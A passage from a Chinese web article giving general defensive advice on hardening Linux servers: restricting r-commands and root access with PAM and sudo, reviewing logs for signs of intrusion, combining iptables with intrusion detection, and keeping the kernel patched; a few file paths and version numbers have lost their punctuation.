osts文件或者hostsequiv文件核准进入的,因此一定要确保root账号不包括在这些文件之内。由于r等远程指令是黑客们用来攻击系统的较好途径,因此很多安全工具都是针对这一安全漏洞而设计的。例如,PAM工具就可以用来将r字头公用程序有效地禁止掉,它在/etc/pamd/rlogin文件中加上登录必须先核准的指令,使整个系统的用户都不能使用自己home目录下的。rhosts文件。6、限制:root用户权限管理Root一直是Linux保护的重点,由于它权力无限,因此最好不要轻易将超级用户授权出去。但是,有些程序的安装和维护工作必须要求有超级用户的权限,在这种情况下,可以利用其他工具让这类用户有部分超级用户的权限。sudo就是这样的工具。sudo程序允许一般用户经过组态设定后,以用户自己的密码再登录一次,取得超级用户的权限,但只能执行有限的几个指令。例如,应用sudo后,可以让管理磁带备份的管理人员每天按时登录到系统中,取得超级用户权限去执行文档备份工作,但却没有特权去作其他只有超级用户才能作的工作。sudo不但限制了用户的权限,而且还将每次使用sudo所执行的指令记录下来,不管该指令的执行是成功还是失败。在大型企业中,有时候有许多人同时管理Linux系统的各个不同部分,每个管理人员都有用sudo授权给某些用户超级用户权限的能力,从sudo的日志中,可以追踪到谁做了什么以及改动了系统的哪些部分。值得注意的是,sudo并不能限制所有的用户行为,尤其是当某些简单的指令没有设置限定时,就有可能被黑客滥用。例如,一般用来显示文件内容的/etc/cat指令,如果有了超级用户的权限,黑客就可以用它修改或删除一些重要的文件。7、追踪黑客踪迹:日志管理当用户仔细设定了各种与Linux相关的配置(最常用日志管理选项),并且安装了必要的安全防护工具之后,Linux操作系统的安全性的确大为提高,但是却并不能保证防止那些比较熟练的网络黑客的入侵。在平时,网络管理人员要经常提高警惕,随时注意各种可疑状况,并且按时检查各种系统日志文件,包括一般信息日志、网络连接日志、文件传输日志以及用户登录日志等。在检查这些日志时,要注意是否有不合常理的时间记载。例如:正常用户在半夜三更登录;不正常的日志记录,比如日志只记录了一半就切断了,或者整个日志文件被删除了;用户从陌生的网址进入系统;因密码错误或用户账号错误被摈弃在外的日志记录,尤其是那些一再连续尝试进入失败,但却有一定模式的试错法;非法使用或不正当使用超级用户权限su的指令;重新开机或重新启动各项服务的记录。上述这些问题都需要系统管理员随时留意系统登录的用户状况以及查看相应日志文件,许多背离正常行为的蛛丝马迹都应当引起高度注意。8、横向扩展:综合防御管理防火墙、IDS等防护技术已经成功地应用到网络安全的各个领域,而且都有非常成熟的产品。在Linux系统来说,有一个自带的Netfilter/Iptables防火墙框架,通过合理地配置其也能起到主机防火墙的功效。在Linux系统中也有相应的轻量级的网络入侵检测系统Snort以及主机入侵检测系统LIDS(Linux Intrusion Detection System),使用它们可以快速、高效地进行防护。需要提醒注意的是:在大多数的应用情境下,我们需要综合使用这两项技术,因为防火墙相当于安全防护的第一层,它仅仅通过简单地比较IP地址/端口对来过滤网络流量,而IDS更加具体,它需要通过具体的数据包(部分或者全部)来过滤网络流量,是安全防护的第二层。综合使用它们,能够做到互补,并且发挥各自的优势,最终实现综合防御。9、评测:漏洞追踪及管理Linux作为一种优秀的开源软件,其自身的发展也日新月异,同时,其存在的问题也会在日后的应用中慢慢暴露出来。黑客对新技术的关注从一定程度上来说要高于我们防护人员,所以要想在网络攻防的战争中处于有利地位,保护Linux系统的安全,就要求我们要保持高度的警惕性和对新技术的高度关注。用户特别是使用Linux作为关键业务系统的系统管理员们,需要通过Linux的一些权威网站和论坛上尽快地获取有关该系统的一些新技术以及一些新的系统漏洞的信息,进行漏洞扫描、渗透测试等系统化的相关配套工作,做到防范于未然,提早行动,在漏洞出现后甚至是出现前的最短时间内封堵系统的漏洞,并且在实践中不断地提高安全防护的技能,这样才是一个比较的解决办法和出路。10、保持更新:补丁管理Linux作为一种优秀的开源软件,其稳定性、安全性和可用性有极为可靠的保证,世界上的Linux高手共同维护着个优秀的产品,因而起流通渠道很多,而且经常有更新的程序和系统补丁出现,因此,为了加强系统安全,一定要经常更新系统内核。Kernel是Linux操作系统的核心,它常驻内存,用于加载操作系统的其他部分,并实现操作系统的基本功能。由于Kernel控制计算机和网络的各种功能,因此,它的安全性对整个系统安全至关重要。早期的Kernel版本存在许多众所周知的安全漏洞,而且也不太稳定,只有20x以上的版本才比较稳定和安全(一般说来,内核版本号为偶数的相对稳定,而为奇数的则一般为测试版本,用户们使用时要多留意),新版本的运行效率也有很大改观。在设定Kernel的功能时,只选择必要的功能,千万不要所有功能照单全收,否则会使Kernel变得很大,既占用系统资源,也给黑客留下可乘之机。在Internet上常常有最新的安全修补程序,Linux系统管理员应该消息灵通,经常光顾安全新闻组,查阅新的修补程序。

DABAN RP主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
网站模板库 » 服务器数据修复时,为了能提高硬盘阵列数据恢复,服务器管理员(不是数据恢复专业人士)要怎么做?

0条评论

发表评论

提供最优质的资源集合

立即查看 了解详情